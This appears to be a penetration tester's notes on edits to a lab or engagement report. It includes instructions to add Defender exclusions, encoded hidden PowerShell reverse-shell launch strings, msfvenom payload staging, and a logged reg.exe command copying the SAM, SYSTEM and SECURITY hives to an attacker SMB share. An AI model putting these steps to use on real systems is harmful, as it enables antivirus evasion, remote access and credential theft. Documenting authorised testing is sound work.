pentest-report.txt quarantined by Windows Defender
Ensure you set a defender exclusion before you unzip the project on your PC

----------------------------------
Scripts:
Make sure Windows Security is initialized before running the script

Confirm these scripts still work after the edits:
DC01 script
DEV01 script


------------------------------------------------


Penetration Testing Report Edits:

ADMIN04:

Use the correct payload for the reverse shell generator
powershell.exe -NoP -NonI -ExecutionPolicy Bypass -EncodedCommand
not
powershell -nop -w hidden -e

encode4449.py should be changed


ADMIN01:
Change Port 443 to 4451
Change Port 444 to 4452


OVERALL:
Make sure in the penetration testing report, you change directory to the intended directory, before creating the msfvenom payload. Make sure the python3 http server is started immediately after creating the payload.



-----------------------------------------------------------------------------------------------------------------------
Questions:


WEB02: Before getting NT Authority, are we able to check the MP preference to see which directories have an exclusion? Are we able to set an exclusion?


DMZ01: Before getting NT Authority, are we able to read Chris' PowerShell history file?





----------------------------
Potential Edits:

WEB02 execution:
PS C:\Windows\System32> reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
reg.exe save hklm\sam \\10.10.14.10\samba\sam.save; reg.exe save hklm\system \\10.10.14.10\samba\system.save; reg.exe save hklm\security \\10.10.14.10\samba\security.save
File \\10.10.14.10\samba\sam.save already exists. Overwrite (Yes/No)?yes
ERROR: A required privilege is not held by the client.

Why is a required privilege not held? Was this a fluke? Or does WEB02 need to be rebooted and re-backed-up?



MAIL01 script:
Add the instruction to open server manager.
